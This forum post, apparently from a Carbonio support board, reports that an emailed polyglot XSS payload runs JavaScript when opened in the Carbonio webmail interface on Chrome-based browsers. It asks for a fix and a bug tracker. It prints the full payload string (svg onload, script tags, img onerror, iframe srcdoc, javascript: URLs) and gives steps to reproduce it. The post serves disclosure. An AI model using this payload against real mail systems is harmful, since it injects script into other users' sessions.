Notifications
Clear all
Topic starter
04/30/2026 16:39
Hello.
Recently we found out that some Javascript can be executed inside Carbonio web interface.
We had received mail with this code inside mail body
--!>"'><svg/onload=confirm('X')>';alert(1)//</style><script>confirm(1)</script><img src=x onerror=confirm(1)><iframe srcdoc="<script>confirm(1)</script>"></iframe>javascript:confirm(1)//</style><style>}body{background:url(javascript:confirm(1))};{color:expression(confirm(1))}</style><a href="javascript:confirm(1)">x</a><div style="color: expression(confirm(1))"></div><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
and two pop-ups with this text - Javascript from servername 1 - were shown when I just open this mail. I guess this looks like vulnerability.
Affected only Chrome-based browsers.
Steps to reproduce:
- Receive the code above in separate email, or attach this code as EML file
- Open email or attached EML file with this code
- Javascript Pop-up shows up twice
What can we do to prevent this? Thank you
zmcontrol -v Carbonio Release 26.3.1
Topic starter
04/30/2026 18:30
Due to the connectivity lag I accidentally posted the same thing three times, other two topic can be deleted.
Anyway, is there any bug tracker to post this kind of issue? Topics here in General rarely answered.
This post was modified 3 days ago by arukashi
